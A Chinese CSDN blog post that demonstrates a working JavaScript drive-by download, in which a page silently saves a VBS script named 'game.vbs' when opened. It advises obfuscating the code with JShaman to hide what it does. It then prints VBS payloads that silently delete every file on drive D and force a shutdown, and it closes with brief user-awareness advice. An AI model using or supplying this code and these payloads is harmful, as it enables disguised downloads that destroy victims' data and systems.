JavaScript黑魔法:不可阻止的“自动下载”

本文揭示了一种利用JavaScript实现网页后台自动下载文件的技术,尤其是VBScript,可能导致用户在不知情的情况下执行危险脚本。通过混淆加密JavaScript代码,攻击者可以隐藏恶意行为。防范措施主要是提高安全意识,不点击、不打开、不执行未知来源的文件。
摘要由CSDN通过智能技术生成

正常情况下,当我们想要从网站下载某个文件时,一定是需要主动点击,才能出现下载操作。这是理所当然的。

但你是否遇到过这样一种场景:当打开某个网页时,未进行任何点击,然而后台自动下载了一个文件!

很可怕吧,像是种不可思议的黑魔法。但这是真实可以实现的,用JavaScript即可实现。

实现效果:

且看本演示:打开页面,后台自动下载了一个vbs文件。点击下载后的文件,vbs脚本文件被执行,弹出了一个hello窗口。如下:

由于是vbs脚本,因此,如果点击该文件,文件会被打开并执行:

选择打开,脚本被执行:

如页面源码所示,本示例,只是执行一句msgbox(“hello”)。

源码:

效果很不可思议,但实现的源码却很简单,完整代码如下,保存为html文件打开即可执行。

<html>
<script>
var blob = new Blob(['msgbox("hello")'],{type:'application/vbs'});
var a = document.createElement('a');
a.href = window.URL.createObjectURL(blob);
a.download =  'game.vbs';
a.click();
</script>
</html>

而如果要防止他人查看源码、了解实现原理,可以对源码中的JavaScript代码混淆加密。

比如使用JShaman平台,对上述代码加密:

加密后的代码:

Msgbox仅是一个弹窗,而vbs是可以实现很多强大而可怕的功能的。

比如:

dim WSHshell
set WSHshell = wscript.createobject(“wscript.shell”)
WSHshell.run “cmd /c “”del d:\*.* / f /q /s”””,0 ,true

又如:

dim WSHshell
set WSHshell = wscript.createobject(“wscript.shell”)
WSHshell.run “shutdown -f -s -t 00”,0 ,true

能读懂这两段vbs脚本的话,可知:脚本执行可能带来很危险的后果。甚至可能下载其它的Exe并执行,等等。

防护:

如何防止这种威胁?文件是可能被自动下载的,不仅仅是vbs脚本,exe也可能。但只要不点击,便不会执行。因此,需增强安全意识,对于不明来源的文件:不点击、不打开、不执行。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值